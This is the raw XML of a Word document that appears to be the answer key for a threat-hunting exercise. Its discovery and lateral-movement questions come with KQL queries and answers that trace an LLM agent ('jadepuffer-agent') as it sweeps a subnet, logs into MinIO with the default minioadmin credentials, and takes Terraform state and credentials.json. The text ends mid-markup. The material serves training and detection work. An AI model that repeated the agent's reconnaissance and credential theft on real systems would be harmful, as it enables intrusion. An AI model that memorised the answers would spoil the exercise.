                                <a:ext cx="5943600" cy="15438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121.56pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId17" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="707"/>
        <w:pBdr/>
        <w:spacing w:after="100" w:before="240"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Section 4: Discovery and Lateral Movement</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A second interpreter was started on ff-lf-01 at 19:27, distinct from the one at 19:21. Give its process id.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4491.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxProcess_CL, 19:27:28.610, spawned by PID 4471, running python3 -c &lt;base64 subnet sweep&gt;.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="67709B7D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxProcess_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0D59A7BC">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01" and TargetProcessName =~ "python3.11"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="4409E05C">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, ActingProcessCommandLine, TargetProcessName, TargetProcessCommandLine, TargetProcessId</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4914318A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="1084748"/>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58927" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId18"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="10847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8.00pt;height:85.41pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId18" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Scope the sweep to the process you identified earlier. Give each address and port it reached.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:t xml:space="preserve">10.4.0.20:9000, 10.4.0.30:3306, 10.4.0.40:8848</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinuxNetwork_CL, 19:27:31 through 19:27:36, all three connections attributed to ActingProcessId 4491.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1EE22336">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LinuxNetwork_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="0727BAED">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where DvcHostname =~ "ff-lf-01" and ActingProcessId == 4491</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="14B2FE1A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, DstIpAddr, DstPortNumber, ActingProcessId</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| order by TimeGenerated asc</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="05CFA6DD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5381625" cy="3524250"/>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585924" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId19"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5381624" cy="35242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23.75pt;height:277.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId19" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">One of those services let it in without an exploit. Name the service and what it accepted.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">minioadmin, minioadmin</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, 19:27:39, tool_result reads auth ok minioadmin:minioadmin.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="7AD64AE1">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="47BA7575">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p w14:paraId="34688212">
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| where tool_result has "auth ok"</w:t>
            </w:r>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response, tool_name, tool_result</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="109CA5D8">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="622704"/>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8285" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId20"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
                                <a:ext cx="5943600" cy="6227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8.00pt;height:49.03pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;rotation:0;z-index:1;" stroked="false">
                      <v:imagedata r:id="rId20" o:title=""/>
                      <o:lock v:ext="edit" rotation="t"/>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r/>
            <w:r/>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="708"/>
        <w:pBdr/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q4</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">What did it take from that service?</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">terraform-state, credentials.json</w:t>
      </w:r>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LLMAgentLogs_CL, 19:30:35.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="120"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Query:</w:t>
      </w:r>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="180" w:type="dxa"/>
              <w:top w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="03CF4644">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMAgentLogs_CL</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="6540D03E">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| where actor == "jadepuffer-agent"</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p w14:paraId="5BE97C7A">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| where tool_result has "credentials.json"</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr/>
              <w:spacing w:after="0"/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">| project TimeGenerated, model_response, tool_name, tool_result</w:t>
            </w:r>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r/>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80"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="999999" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="999999" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:left w:w="150" w:type="dxa"/>
              <w:top w:w="260" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
              <w:bottom w:w="260" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="206CD9C2">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r/>
            <w:r>
              <mc:AlternateContent>
                <mc:Choice Requires="wpg">
                  <w:drawing>
                    <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                      <wp:extent cx="5943600" cy="672434"/>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34431" name=""/>
                              <pic:cNvPicPr>
                                <a:picLocks noChangeAspect="1"/>
                              </pic:cNvPicPr>
                              <pic:nvPr/>
                            </pic:nvPicPr>
                            <pic:blipFill rotWithShape="1">
                              <a:blip r:embed="rId21"/>
                              <a:stretch/>
                            </pic:blipFill>
                            <pic:spPr bwMode="auto">
                              <a:xfrm rot="0" flipH="0" flipV="0">
                                <a:off x="0" y="0"/>
